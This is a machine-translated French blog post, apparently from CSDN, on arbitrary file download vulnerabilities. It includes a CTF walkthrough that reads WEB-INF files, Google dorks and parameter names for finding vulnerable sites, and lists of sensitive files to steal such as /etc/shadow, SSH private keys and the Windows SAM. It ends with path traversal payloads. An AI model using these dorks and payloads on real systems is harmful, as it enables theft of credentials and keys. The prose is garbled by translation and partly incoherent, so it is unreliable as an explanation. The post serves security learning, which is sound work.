La vulnérabilité de téléchargement de fichier arbitraire

Avant-propos:

Auparavant, eu des contacts avec cette connaissance, il y a juste cet examen d'une question cette connaissance, vous apprendrez en détail sur la vulnérabilité de téléchargement de fichier arbitraire

Télécharger les lacunes Profil

En raison des besoins des entreprises, de nombreux sites ont souvent besoin de fournir des documents (pièces jointes) blocs fonctionnels de téléchargement, mais si le fichier est téléchargé des restrictions ne télécharge pas directement leurs fichiers via le chemin absolu, l'utilisateur malveillant peut utiliser ce serveur à télécharger fichiers sensibles sur le serveur pour de nouvelles menaces et attaques.

Télécharger toute vulnérabilité des méfaits

En téléchargeant des fichiers, vous pouvez télécharger tout serveur de fichiers, le code spécifique de l'information de configuration de service Web et des systèmes de serveur, vous pouvez également télécharger des informations de configuration dans la base de données, ainsi que des informations de réseau interne pour détecter, et ainsi de suite.

En brièvement ci-dessus, nous pouvons voir toute la vulnérabilité de téléchargement est très commun, si les utilisateurs visualisent ou télécharger le fichier ne limite pas, mais elle pourrait être exploitée, causant des dommages, puis apprendre à télécharger soit la vulnérabilité utilisation.

Utilisez un téléchargement de vulnérabilité

existence

Liens du point de vue, semblable à ceux-ci, il est possible de télécharger des lacunes existent

download.php?path=
download.php?file=
down.php?file=
data.php?file=
readfile.php?file=
read.php?filename=

titre analytique

Ici pour faire une question à titre d'exemple
Insérer ici l'image Description
voir le code source et trouvé ce format, la spéculation peut télécharger un ou plusieurs fichiers contenant
Insérer ici l'image Description
ouvert et trouvé une page écrite en Java ,
Insérer ici l'image Description
nous pouvons alors si vous pouvez faire avec un téléchargement de vulnérabilité de cette approche, essayer, mais la chose étrange est que nous construisons tous les paramètres ne sont pas trouvés, le chef m'a dit que cette question a besoin de changer la méthode de requête pour le travail ou l'expérience des enseignants en profondeur

Entrée, vous pouvez vraiment trouver

filename=WEB-INF/web.xml

Insérer ici l'image Description
Il y a deux fichiers clés ont trouvé l'emplacement du drapeau, d'abord jeter un oeil àcom.wm.ctf.FlagController

filename=WEB-INF/classes/com/wm/ctf/FlagController.class

Insérer ici l'image Description
Trouvé une chaîne de base64, le décodage peut être dérivé drapeau

Cette question implique beaucoup de connaissances, regarder de plus près, il a dit:

Tout d'abord, nous voyons que cela est écrit dans les pages web java et répertoire WEB-INF de Java est la sécurité des applications WEB.

Le dossier WEB-INF en plus web.xml, mais aussi garder un classesdossier pour placer les *.classfichiers, ces *.classfichiers sont écrits dans le personnel de la bibliothèque de conception Web pour obtenir la jspséparation des services d'art de premier plan de la page et arrière - plan, fait l'entretien du site est très facile à utiliser. web.xmldescripteur de déploiement fichier fichier XML pour le site, le déploiement du site est très important.

Voilà pourquoi nous commençons à voir la directe WEB-INF/web.xmlcause de la

Synthétiserons WEB-INF ou commun de fichiers

/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
/WEB-INF/database.properties:数据库配置文件
漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码

Sachant cela, le problème ci-dessus est vraiment pas difficile, vous examinez simplement si une connaissance approfondie

Résumé de la vulnérabilité

Téléchargeons toutes les vulnérabilités peuvent être recherchés par Google

inurl : readfile.php?file=
inurl : download.php?file=

À partir du nom du paramètre point de vue, à peu près:

&readpath=
&filepath=
&Path=
&inputfile=
&url=
&Lang=
&dis=
&data=
&readfile=
&menu=
META-INF=
WEB-INF

Ces paramètres peuvent être des lacunes (bien sûr, de voir comment la protection latérale de gestion)

En résumé linux télécharger et utiliser les fichiers Windows

les fenêtres:

C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件

linux

root/.ssh/authorized_keys////如需登录到远程主机,需要到.ssh目录下,新建authorized_keys文件,并将id_rsa.pub内容复制进去
/root/.ssh/id_rsa//ssh私钥,ssh公钥是id_rsa.pub
/root/.ssh/id_ras.keystore//记录每个访问计算机用户的公钥
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow//账户密码文件
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数

vérification de la vulnérabilité

xxx.php?f=../../../../../../etc/passwd

xxx.php?f=../index.php

xxx.php?f=file:///etc/passwd

Paramètre f valeurs de paramètres fichier PHP:

  1.文件被解析,则是文件包含漏洞

  2.显示源代码,则是文件查看漏洞

  3.提示下载,则是文件下载漏洞

Divers chemin du fichier
et enfin fournir un résumé des ressources Gangster

résumé

Trop de nourriture, une bonne école, l'écriture suivante est pas très détaillée, allez à gauche pour voir qwzf Blog Gangster

Publié 71 articles originaux · a gagné les éloges 80 · vues 10000 +

Je suppose que tu aimes

Origine blog.csdn.net/qq_43431158/article/details/102649596
conseillé
Classement